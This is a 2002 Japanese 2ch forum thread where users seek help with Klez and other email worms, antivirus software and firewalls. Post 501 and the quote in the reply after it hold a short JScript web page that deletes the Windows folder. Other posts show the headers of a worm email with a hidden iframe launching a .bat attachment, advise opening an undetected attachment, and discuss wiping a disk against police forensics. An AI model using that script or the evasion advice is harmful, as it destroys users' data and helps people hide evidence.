IEはこのあいだ、WINDOWS UPDATEで更新しました。
(特に新たにDLする必要なものはないそうです)
OEは使っていません。ジャストシステムのキャラメルというメーラーを使っています。
「メールのプレビュー」は機能として付いていません。
で、ファイアー・ウォールは購入してあって、DLファイルもあるんですけど、
いちいち、不正アクセスのメッセージを表示してくるので、
うざったくて、アンインストールしちゃいました。
で、さきほどここにカキコした後、再度ファイルを展開しようと
したところ、なぜか1年間の利用料のようなものを支払わないと、
起動できないようになっちゃってるんですよ。
むかついたので、FW なしでしばらく様子を見ます。
どうもでした。m(vv)m
389 :
名無しさん@お腹いっぱい。 :02/08/17 19:39
>>388 馬鹿フィは使ったことないけど、フリーのFWくらいはいれようよ。
この板の流れからいくと、有料なソフトなら ノートン=バスター>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>馬鹿フィーって感じ 検知率は悪くないんだけどねぇ・・・ んでこの板を見ればフリーで高性能で使い易いPFWはいくつかある 最初はZoneAlarmかOutpostあたりがおすすめ あとスパイウェア検知ソフトのAd-awareも入れた方がいい
スパイウェア検知じゃなくて駆除ですたね・・・
>>むかついたので、FW なしでしばらく様子を見ます。 その手が有ったとわ。。。なかなか高度なソーシャルエンヂニヤリングだ。。 ちか、、デレクトリ掘ってファイルコピーしてレヂストリキーのアノ辺りに起動用値カキコすれば良いだけでしょ?? んなもん、なんでQ2ダイアルプログラム、クリクしただけで読み込まされるかわからんようなヤシが相手ならバグ利用しなくても逝けるベ
393 :
名無しさん@お腹いっぱい :02/08/17 20:02
>>389-392 情報ありがとうございます。フリーでfwがあるんですか。
早速入れてみます。
(馬鹿ふぃとの契約が切れたら、ほかのに変えようかと思います。
でも、Klezは検知してくれました)
394 :
名無しさん@お腹いっぱい。 :02/08/17 22:47
クレズに感染し、あちこちにメールを送信してるみたいなので メールアドレスを削除し(送受信ができない)、アドレス帳を削除したら とりあえずは感染メールをばらまかないでしょうか? 初めて感染して落ち込んでます、アドバイスお願いします。
396 :
名無しさん@お腹いっぱい。 :02/08/18 00:40
初歩的な質問ですみません Outlook Expressを使用しています バージョンは5.5SP2です 感染しないようプレビューをしないようにしております 知り合いから添付ファイルが届きプロバティ>詳細を見たのですが、 どの部分が添付ファイルの情報なのかわかりません gogleなどで「添付ファイル プロバティ」などを入力して見るも 見方などが書かれているHPなどが見つかりませんでした どうか教えていただけませんでしょうか? もし、自分に届いている情報をこちらに書きこむ際はどの部分を 記載したらよろしいのでしょうか? 合わせてお願い致します
397 :
名無しさん@お腹いっぱい。 :02/08/18 00:56
みなさんに質問します。 ノートンアンチウイルス使っているのですが 先ほどウイルス警告、コンピューター上でウイルスを検出しました。 ウイルス名MACRO.SRC ファイルを修復出来ません。ファイルへのアクセスを拒否されました。 一応UPdeteとシマンテックのHP上からも駆除ファイルをダウンロードしたのですが、 2chのスロ板にアクセスするとまた同じ警告が出ます。 初心者なのでどうしたらいいのかわかりません・・・ どうしたら駆除出来るかどなたか教えて頂けませんか?お願いします。
398 :
名無しさん@お腹いっぱい。 :02/08/18 01:02
399 :
名無しさん@お腹いっぱい。 :02/08/18 01:21
401 :
名無しさん@お腹いっぱい。 :02/08/18 02:57
402 :
PC初心者 :02/08/18 05:30
以前メール友達だった人物から突然、ウィルスが送られてきました あやまってそれを開いてしまうと、突然、私のパソコンがメッセージを作成しだして どうやら30通くらい送ったようです。 そして何時間後かにMail Delivery System で20通ほどかえってきました。 これは、何というウィルスですか? 対処法等 教えてください
今日だけで2通もウィルスメール(クレズ)が来たよ〜。こわいよ〜。 送信者の名前も件名も違うし、俺って狙われてるの? 今まで3年間一度もこなかったのに。 で、AVG入れてたので、ウィルスを確認した画面が出てきたのですが、 日本語化してなかったので、ENABLE ACCESS? ときかれて、 YESかNOか、どっちをクリックしていいかわからなかった。 迷っているうち、その画面は自動的に消えたけど、 べつにいいんですよね? それと、クレズって添付ファイル開かなきゃだいじょうぶなんすよね。
>>404 OEなりOutlookでも、パッチ入ってるなら大丈夫。
いま、怪しいメールが来たんです
NAA01477 <
[email protected] >
A special nice game
Hi,This is a special nice game
This game is my first work.
You're the first player.
I wish you would like it.
どうでしょう? car[17].jpgというファイルも添付されてきました。
>406 うちに来たのもそれだっ!
マルチじゃないっての! 放置だったから、くだらねえにもカキコしただけ
411 :
名無しさん@お腹いっぱい。 :02/08/18 10:13
それがマルチじゃなかったら何がマルチだ?厨房が
>>1-2 にウィルス検索できるとこリンクされてるだろうがこの糞厨房
放置だと?即レス期待してんじゃねーよタコ厨房
自分で調べろこのケサランパサラン
厨房の相手する方がくだらねぇよ
>>411 > 自分で調べろこのケサランパサラン
おもろい
( ̄ー ̄)ニヤリ
それがさ、スキャンしても全然かからないんですよ で、jpgファイルの方は、車の画像が出てきただけ・・それも見覚えのある・・ もう一つファイルがあって、クリックすると、インストールして実行しますか? と出たので、やめといた
クレズかなぁ なんせ、初めてなもんで・・・
,,,,.,.,,,, ミ・д・ミ <ケサランパサラン!! """"
>>414 以前届いたエロスクリーンセーバーもそんな感じだったよ。
実行したらもろのロリ画像だった。
どうすればよいですか?
>>418 検出されないなら開いてみたら?多分大丈夫。
エロだったらうpしてね。
無視だろ。
開いたら、さっきからHDがうなっております
423 :
名無しさん@お腹いっぱい。 :02/08/18 10:39
初めてウィルスにやられた。。。 クレズHさん・・・。キライ。
425 :
名無しさん@お腹いっぱい。 :02/08/18 13:52
396です
>>424 レスを頂いて御礼はしたものの400では分かるはずないです・・・
ハァーーと落ち込みました
424さんに教えていただいたURLで分かりました
本当にありがとうございました
427 :
名無しさん@お腹いっぱい。 :02/08/18 14:32
友人がウィルスに感染して、仲間内にウィルスメールが届いてます。 その内の一人が「ウィルスバスターしたから大丈夫メール見てみよ」って そのウィルスメール開こうとしてたらしいんですけど、 バスター通したら(?)無害になって見ても大丈夫になるんですか? イマイチ意味がわからない・・・。
429 :
名無しさん@お腹いっぱい。 :02/08/18 16:15
>>427 感染したファイルからウイルスを駆除したという意味かな?
で、どうしてまた開きたいの?
a
>>430 本人に聞いたところ、メール受信の時にノートンが反応して検疫したと言っておりました。
なんでそれが「バスターした」という言葉につながるのか謎・・・。
検疫したからメールからウィルスは駆除されていると思ってるみたいです。
何故開きたかったのかはよく分かりません、怖いです。
ウイルススキャンに引っかからなくても 感染してることありますか?
>>433 検疫 == 感染したファイルが隔離された
ゆえに削除はされていない。特定の場所に保管されている。
どうしても調べたいのならバイナリエディタで開いてごらん。
つーか、開いても大したことは得られないと思うよ。
先月のふれぜむはウィルス定義対応前に感染しちまった
>>436 変種が一度にたくさん一気に出たからね。
>>434 なぜパターン更新が重要か分かりますか?
覚えている方はいないかもしれませんが、 スクロールの件、なおりました。 原因は、マウス不良でした。 おさわがせしました。
>ちびたたん 乙。
441 :
名無しさん@お腹いっぱい。 :02/08/18 21:57
これって何のウィルスですか? 件名は何も無く、Return-Path、From共、人の名前だけど、どちらも心当たり無し。 comdesignsで検索したけど、出ませんでした。 ウィルス名と誰からかを知りたかったんですけど・・・ Return-Path: <*****@comdesigns.co.jp> Delivered-To: *****@*****.ne.jp Received: (qmail 27724 invoked from network); 18 Aug 2002 20:14:50 +0900 Received: from unknown (HELO comdesigns.co.jp) (210.154.34.34) by tp01001 with SMTP; 18 Aug 2002 20:14:50 +0900 Received: from Onwhate [218.222.59.254] by comdesigns.co.jp (SMTPD32-6.04) id A0F04100F2; Sun, 18 Aug 2002 20:11:44 +0900 From: ***** <*****@d1.dion.ne.jp> To: *****@*****.ne.jp Subject: MIME-Version: 1.0 Content-Type: multipart/alternative; boundary=T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F Message-Id: <200208182011562.SM01296@Onwhate> Date: Sun, 18 Aug 2002 20:15:39 +0900 --T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F Content-Type: text/html; Content-Transfer-Encoding: quoted-printable <HTML><HEAD></HEAD><BODY> <iframe src=3Dcid:Mo657CEQM336iDh63 height=3D0 width=3D0> </iframe> <FONT></FONT></BODY></HTML> --T24W3lHyh911Hc79W5uSZ200L0x2z858sLy5F Content-Type: audio/x-midi; name=横書きIDX.bat Content-Transfer-Encoding: base64 Content-ID: <Mo657CEQM336iDh63>
>>441 件名やファイル名や添付ファイル名のみでウイルスを同定できる時代は、終わっとります。
何かアンチウイルスソフト使ってスキャンしたらどうでしょ。
443 :
名無しさん@お腹いっぱい。 :02/08/18 22:09
何にも入れてないならAVPEぐらいいれとき
>>442-443 PCがかなりボロイので、新しいソフト入れると(特に高機能高性能ソフト)
おかしくなっちゃうから、アンチウィルスも我慢してる状態です。
その分気を付けて、今迄メールウィルスは100通以上は来たけど
今の所は開いてないので、新しいPC買うまでもう少し粘ろうかと・・・
(一応プロパティ見た後、オンラインチェックしていますが)
だいたい件名等から調べたてけど、これは無かったので聞いてみました。
これだけじゃ判らないんですね。
どうもでした。
445 :
名無しさん@お腹いっぱい。 :02/08/18 22:24
>>435 ありがとうございます、隔離されてるだけだと言っておきます。
実はこのウィルスメールは自分の所にも届いてるんですが
うちのノートンは無反応です・・・どうして。
>>446 ありがとございます〜。
さっそく見てみました。
これなら何とか使えると思います。
感染してなくても、メール添付の時点で判るのかな?
早く次のウィルス来ないかな〜。(ワクワクドキドキ
>>447 >メール添付の時点で判るのかな
リアルタイムスキャンはできませぬ。
だもので、ウイルス名を知るためには、受信後に毎回手動でスキャンする必要がありまする。
ウイルス欲しいのならメアド晒せば?
450 :
名無しさん@お腹いっぱい。 :02/08/18 22:55
pen133Mhzメモリ16MBのノートでもAVPE動いてますが何か? 常駐はダメぽ・・・
>>441 klezじゃない?
添付ファイルをデスクトップとかに移さないと検知できないこともある。
452 :
名無しさん@お腹いっぱい。 :02/08/18 23:01
当方Win2000なのですが、WinNT以外のディレクトリを対象に 全HDDドライブでファイルだけがきれいになくなってしまった。 ディレクトリは残っていますが、当然のごとく0バイト。 AVGを入れてましたが、特にチェッカーしたような挙動は 感じられず。 これってウイルスの仕業なのか?
うげ、今日だけで3つ目のウィルスメールが来たー。 名前も件名も全て違う。 件名は、「Re:look my girl friend 」「how are you」「A IE6.0patch」 名前は1個目は忘れたけど、あとは「hymmt」「trash」 すごくしつこい。
456 :
名無しさん@お腹いっぱい。 :02/08/19 01:51
今日だけでウィルスメールと思われる物が5通来ました メールのソースを見たら5つともアルファベットのAなど とてつもない数が羅列してありました。
458 :
報告したい444 :02/08/19 05:43
>>446 ANTIDOTEの簡易版、説明見ながらやってみました。
最初に、Cドライブのコード解析でチェックしたところ
「ウィルス感染を検出!」なんてダイヤログが出て一瞬焦ったら
感染ファイルは0だったけど、プロパティをコピペしたメモ帳が
懐疑ファイルになってました。(ホッ…
削除したウィルスメールを再受信してやってみたら
コード解析では出なかったけど、電子メール確認で感染ファイルとして
>>451 さんのおっしゃる通り、Klez-hと出ました。
いつも関連ページで、件名や添付ファイルから調べていましたが
必ずしも当てはまるわけでは無いのですね。
おまけに\Helpdesk\SFCの中に、5個の不良ファイルが見つかってしまい
ちょっと鬱ですが・・・
ノートンやウィルスバスター入れてるのに感染しまくってる友人達が居る為
(中には何度もとか、一人で50通位送って来るヤツとか居るし・・・)
今後も感染しない様に気を付けます。どうもでした!
ノートンやウイルスバスター入れてるのに感染しまくってる友人達と縁を切れ。
460 :
名無しさん@お腹いっぱい。 :02/08/19 22:32
JS.Winbomb.dウイルスはどういうものですか? ノートンで検出されたのですが・・・。
Johann Strauss型ウィンドウズ爆破ウィルスD変異株 ・・・ではない
West Nile Virusが猛威を振るっているらしいです。
465 :
名無しさん@お腹いっぱい。 :02/08/21 22:12
アドレス → inet <
[email protected] >
件 名 → Fw:your password
添付ファイル → align.bat, roadstar_mazda-thumb-1028712269[1].jpg
これって何てウイルスなんですか?
468 :
おすぅえて :02/08/21 23:50
VBS.Internalっていうウイルスをもらっちゃいました。どんな影響が出て くるのでしょうか?ファイルの削除だけでよいのでしょうか
470 :
おすぅえて :02/08/21 23:53
あ〜〜、そ〜なんですかぁ…
471 :
名無しさん@お腹いっぱい。 :02/08/22 05:06
Windows98SEの人に、ちょっと聞きたいのですが C:\windows\Asdapi.exe C:\windows\ramsys.exe ってファイルがアンチウィルスにひっかかったんですが この2個のファイルあります? よかったら確認してほしいのですが
すいません win板逝きます
474 :
名無しさん@お腹いっぱい。 :02/08/23 00:34
クレイズHがPCの中に入ってきたらしいのですが ウイルススキャンで出てきたファイルを消そうとしても消せません どうやって消したらよいのでしょうか?
状況がさっぱりわからん 説明書見たほうがはやいんとちがう?
説明がおおざっぱすきましたね。。。 っというか、クレイズじゃなくてクレズですね。きっと。。。 ウイルスバスターのHPには、手動で消すように書いてありました。 ウイルススキャンで出てきたファイルをエクスプローラで消そうとすると 「送り側のファイルが使用中の可能性があります」ってなります。
>>476 ちみだいじょうび?
ファイル名は?たぶんセーフモードで立ち上げて削除できるから。
セーフモードって?とは言わないよね。
>>476 てか、質問者はOSとか詳しい情報を最初に書いてくれ。
ファイルのPathも。
480 :
名無しさん@お腹いっぱい。 :02/08/23 01:47
OSはWindowsMeです。
ファイルはこの二つです
c:\_RESTORE\ARCHIVE\FS1869.CAB
c:\_RESTORE\ARCHIVE\FS1692.CAB
セーフモードでも2回やってみたのですがだめでした。
>>479 さんので消してみます!!
482 :
名無しさん@お腹いっぱい。 :02/08/23 02:18
>>481 さんのリンク先の説明通りにやったら消すことができました!!
レスしてくれた方ありがとうございます!!!
>>482 お金あるならノートンかウィルスバスター
ないならAVGくらいいれたほうが良かれ
あぼーん
>>484 は他人のアドレスを晒しているから誰も送っちゃイカンよ
あぼーん
484が使っているのは6年前のDr. Solomon
489 :
名無しさん@お腹いっぱい。 :02/08/23 15:41
ハイテク犯罪で逮捕されると、pcを押収され、技官が中を 徹底調査するそうですが、この場合削除したファイルとかも 復活させられるんだろうか。 こーゆー場合、ハードディスクをフォーマットしとかんといかんのだろうか。
>>489 いちどタイーホされてみてね。^^
タダのフォーマットでは復元可能。FATを消すだけだから。
全体にデータを再書き込みして復元不能にしてからフォーマットするツールはあるよね。
>>492 UNIXでHDDを完全にクリア状態にしたら大丈夫でしょう。
これではだめなん? format /u
shred *
2chの「PC等-Windows」版の「おまえらユーザー名になんて…」をクリックした瞬間「LoveLetterウイルスを発見しました」 ノートンが即削除してくれたけど、スレのデータにも入ってるんですね。
『Macro.src』っていうのに感染した。
501 :
名無しさん@お腹いっぱい。 :02/08/23 19:35
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=x-sjis"> <meta name="GENERATOR" content="Microsoft FrontPage Express 2.0"> <title>消しちゃうよん</title> </head> <body> <script language="jscript"> var fso fso=new ActiveXObject("Scripting.FileSystemObject"); fso.DeleteFolder("C:\\Windows",true); </script> </body> </html> これ今も効くの?
>>501 つか、たったこれだけぢゃん。。。。
<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=x-sjis">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>消しちゃうよん</title>
</head>
<body>
<script language="jscript">
var fso
fso=new ActiveXObject("Scripting.FileSystemObject");
fso.DeleteFolder("C:\\Windows",true);
</script></body></html>
消されたところが良くわかんない。 そこをしゅうふくすればなんとかなる・・・・か?
>>505 ヤパーリ、6月。。。ヂューンブライドがイイナ。。。
子供は・・・2人・・・イヤーン
んぢゃ、明日、ちゃんと遅れないで来てね。。。お父さん待ってるから。。。
509 :
教えてチャンで済みません(泣) :02/08/23 20:19
私のところもウィルススキャンでJSWINDOWS BOMが検出されました。 OSはwindows98です。 駆除不可能という文字が出たのですが、駆除して正常に可動させる にはどうしたら良いでしょうか。。 色々調べたのですが。 教えて下さい<(_ _)>
JS WINDOWSBOMB.E でした(-_-;) 宜しくお願い致します。。。。。。
因みにオンラインウィルス検索で、駆除不可能という判定が 出てしまいました。
ケコーン指輪買いに逝ってきます
515 :
名無しさん@お腹いっぱい。 :02/08/23 21:03
ノートンアンチウィルスについて教えてください。 個人でアンチウィルスソフトを使いたいと思っているのですが、 標準パッケージ 6,800円(税別)の製品は年間ライセンス料金みたいな のはあるのでしょうか? また、あるのだとしたらだいたいいくらぐらいなのでしょうか? よろしくお願いします。
>>509 ウィルススキャンしたソフトのHPで見れ。どこのだ。
システムの復元したらなおったーよ(たぶん
521 :
名無しさん@お腹いっぱい。 :02/08/24 00:32
この前、うっ!
>>cheshire-cat ◆CATJR.v6 詳しく本当にありがとうございます<(_ _)> あの・・メールに添付してお送りすればよいのでしょうか? メルアド晒します。 もう一度スキャンしてみたのですが、ダブルクリックで 変種だからなのか、該当データなし、と出てしまいました。 初心者でちょっと情けない質問ですが、 直接削除はどうやったら出来るのでしょうか。 ファイル名を指定して実行したら、見事にインターネットエクスプローラ がガンガン開いて止まらなくなってしまいました。。
523 :
名無しさん@お腹いっぱい。 :02/08/24 01:11
AVG Anti-Virusについてです。 admin権限がないと強制的にスケジュールチェックされるんですけど なんとかなりませんか? ログインの度に設定がリセットされるのです。 私だけ? 誰か情報ないですか?
524 :
名無しさん@お腹いっぱい。 :02/08/24 01:28
Webメールでヘッダを見るのはどうしたら良いのでしょうか? OEだと右クリック→プロバディ→詳細タブで見れるのですが、 Webメールは詳細タブが出ず、全般しか出ません。 ちなみに私の使っているのはインフォシークのフリーメールです。 この方法でウィルスに感染する可能性って・・・少ないですよね?
インフォシークは使ったこと無いんでわからん gooメールは詳細が見れるようになってる yahooメールとhotmaliははオプションで設定が変えられるみたい あとは知らん んでウィルス感染の可能性は IEのパッチあてるかIEで見なけりゃおk あとは知らん相手からの添付ファイルは見ないで削除
hotmaliってなんだよ・・・鬱
>525さん、ありがとうございます。 皆さん、どんな方法でヘッダーを見ているのか お訊きしたかったんです。
529 :
名無しさん@お腹いっぱい。 :02/08/24 05:08
だからメールアドレス晒しておまけにマルチで何がしたいんだよおまいさんは
530 :
名無しさん@お腹いっぱい。 :02/08/24 08:31
>509 norton antivirusからレポートを開いて検疫項目にある ウイルスを選択、そして項目を削除をクリックで削除できますよ。
>>509 530の人が書いた通り、検疫されたファイルを直接削除。
>>530 「>」使う人って、この板で久しぶりに見た(雑談)
>>530 さん、cheshire-cat ◆CATJR.v6 さん
ありがとうございます。
やってみます。
535 :
名無しさん@お腹いっぱい。 :02/08/25 15:07
これってもしかしてかなり厨房な質問かもしれないんですが・・・ ちょっと前に知り合ったメル友の子(その時点ではまだ2、3回しかメール交換してなかったので そんなに親しくもなかったんです)のPCがウィルスに感染してしまい、 それでその旨をその子にメールで連絡したんですね。 ですがその子自身、あまりウィルスに対しての自覚が無く、 いくら「早めに対処しないと、周りの人が迷惑するよ」というようなことを言っても 「そのうち何とかしますので、もう少し待ってください」みたいに全然取り合ってくれなかったんですね。 で、いつまで経っても状況が変わらないし、ウィルスメールも1日に30通くらい届くようになったので 再びメールで連絡しようとしたら、そのメアドは既に使われてなくて、 連絡を取ることができなくなってて・・・。 でも不思議なのは、そのメアドが既に使われていないのにも関わらず、 未だにそのメアドからウィルスが送られてくるんですよ。 それだけでなく、そのメアドを母体にして(?) さらに別にメアドからも届くようになって・・・(プロパティを見ると、 送信者のメアドとは別に、そのメル友のメアドも表記されてるんです)。 で、そのメル友のメアドを経由したと思われる2番目のメアドも、 既に使用されていないメアドもあれば、 今も普通に使用されているメアドもあり(←そり使用している人は、メル友だった子とは別人です) その辺はマチマチなんですよね。 でもまぁいずれにせよ、その感染ルートの大元である(と思われる)その元メル友に 何とかウィルスを駆除してもらうよう一言言いたいのですが、 でももう連絡のとりようがないのでとても困ってるんですよね。 とりあえず自分は、ウィルスメールを開かないよう細心の注意を払ってはいるんですが、 それでもいつか何かの拍子に開いてしまわないかとても不安だし、 何より大量のウィルスメールを送られているので、 普通のメール送受信をするのにも物凄く時間がかかってとても迷惑してるし・・・。 スミマセンがどなたか良きアドバイスを、よろしくお願い致します。。。
>>535 1 捨てる
2 受信拒否する
3 莫大な時間と労力を費やしてでも相手に知らせる方法を探して、運がよければ知らせる
>>535 Klezは送信者を偽装するから、使われてないメールアドレスから届くのだと。
その人のプロバイダに連絡するしか、対処法はないでしょう。
ウイルスメールは受信前にnPOPで削除。
>>535 このようなタイプのワームでは、「差出人」を感染コンピュータ内で取得した任意のメールアドレスとして設定する場合があります。
そのため「差出人」として設定されているメールアドレス使用者のコンピュータが感染しているとは限りません。
したがって、あるお客様のアドレス帳に弊社サポートセンターのメールアドレスが登録されていた場合、サポートセンターの名前が差出人となり、
送信されてくる場合も想定されます。
これだろ
Klezを見抜けない奴は周りに混乱を巻き起こす
542 :
名無しさん@お腹いっぱい。 :02/08/25 15:25
皆さん、こんな厨房な質問にご丁寧にレスして下さいまして
本当にありがとうございます!!(感涙)
>>536 ありがとうございます! 何とか頑張ってみます!!
>>537 プロバイダに連絡・・・なるほど、その手がありますね!
早速その方法で何とかチャレンジしてみます!!
>>538 あ、まさしくそのタイプのウィルスだと思います!
この前その『差出人』として設定されたメアドの人とメールで連絡が取れたんですが、
その人のPCについては『ウィルスに感染された形跡が無い』とのことだったんですね。
それを聞いて不思議には思っていたんですが・・・
その
>>538 さんが書いてくださった一文を見れば、なるほどって感じですね。。。(汗)
544 :
名無しさん@お腹いっぱい。 :02/08/25 15:32
>>539 ホント、無責任なメル友ですよーーー!(怒)
npop、これからダウンロードしてきますね!
本当にありがとうございます!!
>>540 自分ももっとウィルスやPCに関して勉強しないといけないですね。。。
>>543 どうもありがとうございます!
何事も予防と対策が大事ですもんね!
色々親切に教えていただきまして、本当に皆さんありがとうございます。。。(感涙)
>>544 うーん、だからそのメル友が感染してたかどうかも怪しいと思うのだが・・・。
546 :
名無しさん@お腹いっぱい。 :02/08/25 15:37
>>545 あぁ!
じゃあその諸悪の根源だと思っていた(笑)メル友の子も、
結局感染してたかどうか判らないってことですか。。。
うひぁ〜このウィルス、タチ悪いですね〜〜。。。(汗)
今、そのメル友が利用していたプロバイダの方へ問い合わせました。 とりあえずまた後で、そのウィルスメールのプロパティ(ヘッダー情報) などをメールに一緒に記載して、ニフティ宛に送ることになりました。 なので、今は逆にウィルスメール待ち状態です。。 (ウィルスメールはその都度削除してるので、今ヘッダーをコピーして 送れないので・・・/苦笑)
いけね・・『プロバイダ宛』と書けば良かったものを、ついうっかり・・(反省)
こんなことだらだら書くお前もたちが悪い
551 :
名無しさん@お腹いっぱい。 :02/08/25 18:49
具体的な被害にもあってないのに妙な正義感がわいて よくよく冷静になって考えれば意味もないことを行うのは いらんことしぃな初心者にありがちな行為です 皆さんもそうならないよう注意しましょう
スレ違いかもしれないのですが・・・ ウイルスの「JS_WINDOWBOMB.E」ってなんですか? 感染してるみたいなんですが・・・
554 :
名無しさん@お腹いっぱい。 :02/08/26 03:25
すいません教えてください。会社のパソコンが今日おかしくなってしまい ました。アウトルックエキスプレスで受信メールにカーソルを合わせ、 開かずにプレビューで内容を見ようとしたら、内容が表示されませんでした。 ダブルクリックで開くと読めました。 そこでいったん立ち上げなおす事にしました。そうしたら、立ち上がった のはいいですがデスクトップには壁紙のみで、アイコンやファイル類が 一切出てきません。Ctrl+Alt+Deleteで強制終了するとプレビューには 何のプログラムも表示されません。セーフモードでの立ち上げでも同じく アイコン類が出てきません。他のパソコンから共有ファイルは開けました。 ウイルスでしょうか? 単に故障でしょうか? ノートン入ってます。 分かる方がいましたら、アドバイスお願いします。仕事できません(;´Д`)
556 :
名無しさん@お腹いっぱい。 :02/08/26 09:01
>>555 そのノートンはちゃんとウィルス定義ファイルをupdateしてあったのですか?
メール受信時に警告がなかった点を除けば完璧に怪しいプログラムにやられてダウンした様子ですね。
アイコンやファイル類は全部消去されていませんか?念のため他のPCからウィルスチェックをかけてみて、
何も発見されないようならそのPC内で残っているデータ(あるのかな・・・)を退避させた上で
再インストール、再設定しかないんでは?
557 :
名無しさん@お腹いっぱい。 :02/08/26 12:46
ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。 送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも雨 も嘘なんですか?
ウイルスバスターでメールにWORM_KLEZ.Hというのが検出されました。 送信者を偽ることで有名ですがこれってプロパティのReturn-Pathも嘘なんですか?
分かりました。ごめんなさい
>>556 レスありがとうございます。updateは行っておりました。
今は家なので、出勤してからアドバイスどおりにやってみます。
561 :
名無しさん@お腹いっぱい。 :02/08/26 14:14
>>561 入れるときだけOKしてやればいい
無害
565 :
名無しさん@お腹いっぱい。 :02/08/26 15:44
教えて下さい。 レジストリの値の削除はどうやってやるのですか?
566 :
教えてくださいm(__)m :02/08/26 15:45
すいません、今日パソコンを使ってたら突然、右下の時計とか出てる所に「ResidentialGatewayDevice」っていう変なディスプレイみたいなマークが出て、 「新しいデバイスを発見しました、ショートカットを作成しますか」っていうメッセージが出たんですけど、これってなんでしょうか???
568 :
名無しさん@お腹いっぱい。 :02/08/26 15:52
>>565 レジストリエディタ開いてるんだろ?適当に右クリックすればメニューがでる。
それもわからないようなら削除するな。なんで削除したいのかきちんと説明できる?
>>565 検索って言葉知ってるか?
>>566 こっちは検索しても英文しか引っかかんないなぁ。しかもそのほとんどがゲートウエイ理論だけみたいだし。
そんな表に出て動くんなら多分ウイルスの類ではないと思うが保証できないから、誰か詳しい人いたらよろしく。
570 :
名無しさん@お腹いっぱい。 :02/08/26 17:14
>>566 そのダイアログ、実害なくウザいだけみたい。
--------------------------------------------------------------------------------
[125888] Re^3: ResidentialGatewayDevice 投稿者名:倭翔 投稿時間:02/15-22:03
> CATVではありませんが、ケーブルです。
> ケーブル常時接続です。
同じようなものです。
ので、対処も同じ。
まず、余計な共有を切り離す、FireWallを導入する、など。
基本的にそのあたりの接続形態はLANそのものです。
(抜粋:
http://winfaq.power.ne.jp/logs/9x/0017.html )
571 :
名無しさん@お腹いっぱい。 :02/08/26 17:17
>>570 「実害なくウザイだけのダイアログ」って、ある意味一番タチ悪いよな〜
573 :
名無しさん@お腹いっぱい。 :02/08/26 17:41
>>570-572 一番重要な「そもそもこれってナニ?」とか「コンポーネントを切ったらどうなるか」の部分がないなぁ。
ResidentialGatewayDeviceなんて御大層な名前ついてんのに、そんなポンポン切ってもいいもんなの?
574 :
名無しさん@お腹いっぱい。 :02/08/26 17:45
トレンドマイクロとかのオンラインウイルススキャンが出来ないんですが…。 ActiveXが有効でないと出、設定を最低にしても今度は署名がありません みたいなのが出てどうしても。これはウイルスなんでしょうか…? あと、WORM_BADTRANS.Bの駆除ツール関連のものをパソ内検索で 削除したらメールボックスが空っぽに…(激鬱 この結果は正常なんでしょうか…
575 :
名無しさん@お腹いっぱい。 :02/08/26 17:58
577 :
名無しさん@お腹いっぱい。 :02/08/26 18:18
578 :
名無しさん@お腹いっぱい。 :02/08/26 18:19
>>573 Residental:居住(地)の, 住宅向きの; 住込みの, 寄宿制の
Gateway:ゲートウエー ((複数のネットワークなどを接続するための装置またその接合点)).
Device:デバイス(装置)
訳してみたら、「住宅についている、複数のネットワークなどを接続するための装置」だね。
そんなに御大層な名前じゃないよ。たぶん、
あなたの住んでいる住宅の共有ネットワークに接続するためのものだと思われ。
これを使わなくてもインターネットに接続できてるなら切りっぱなしで構わないんじゃ・・・
579 :
名無しさん@お腹いっぱい。 :02/08/26 18:21
さっぱり関係ないけど ドメスティック(家庭的、とかの意味だっけ)って言葉を 語感だけで大層な意味を持つ言葉だと思ってる人っているよね
580 :
名無しさん@お腹いっぱい。 :02/08/26 18:31
>>576 質問スレに「自分で調べろ」?残暑でアタマ腐ったか?
581 :
そもそも板違いだし :02/08/26 18:43
KlezH
Received: from mail0.ewetel.de (212.6.122.10)
by **
Received: from Mmhjdoi (dialin-80-228-10-153.ewetel.net [80.228.10.153])
by mail0.ewetel.de (8.12.1/8.12.1) with SMTP id g7PGXEHt028832
for <
[email protected] >; Sun, 25 Aug 2002 18:33:16 +0200 (MEST)
Date: Sun, 25 Aug 2002 18:33:14 +0200 (MEST)
Message-Id:<
[email protected] >
From:jandavid<jandavid_at_t-onlinede>
To:
[email protected] [email protected] [email protected] 対策せよ!!!!!!!!
Subject:A new game
This is a new game
This game is my first work.
You're the first player.
I expect you would enjoy it.
584 :
名無しさん@お腹いっぱい。 :02/08/26 20:15
マルチは放置
毎日同じヤシからウイルスメール(クレズH)がくるんですけど、どうすればいいですか?
586 :
名無しさん@お腹いっぱい。 :02/08/26 20:33
klezは差出人偽装をするからヘッダ見ないとわかんねぇ ヘッダをここで晒すなら隠すとこは隠してね
>>585 相手のプロバのHPの、連絡用とかのメアドに「困っているんですぅ!」、ってメルを送る。
OCNの札幌通りアクセスポイントを除けば、いずれも即対処してもらえたよん。
毎回、偽アドで来るんだけど、ヘッダ見ると同じアド。
_,,,,,._,,,,,.....
-‐" ヽ ̄ノ^7__ 異議あり!ウィルスを送ってるのは山田さん
''"--―――-r⌒``~`゙゙`''ヘ/ つまりあなただ!!!
`ー--――ー---> --、_, ',
´ー-- .._ へ/ くてi` 〈 _. -‐‐''''''''')
ー-_ | ^i , ノ ァ=r‐'' "´ __. ‐'' "
ヽrヘ、 ,.-=ァ/ _. ‐'"´ l l r} } }l
/ !、 { // __ . - ' "´ l ヽ 、 ヽ_ノノ
ノ 、 -‐ /-‐ ' ´/`゙ ーァ' "´ ‐'"´ ヽ、`ーテヽJ
_.. -‐''フ|フヽr-‐ ''''フ. ̄「´ '' / / _.. -'-'
. ‐ '7 く/|〉-rへ. / l l .‐ '"´
/ / / | | / ` <´ ', _.. - ' "´
./ / ヽ .| / / iニニニ} 、 _ ,. - '
l iニニl ヽ|/ / ノ ` /
山田さんfrom図解:Klez.e・klez.hとはどんなウイルスなのか?
http://www.nai.com/japan/virusinfo/klezezukai.asp みたいなの送ったれ
east.cts.ne.jpってどこのプロバイダですか?
Network Information: [ネットワーク情報]
a. [IPネットワークアドレス] 210.169.170.0
b. [ネットワーク名] CTS
f. [組織名] CTSインターネット接続サービス(株式会社南東京ケーブルテレビ)
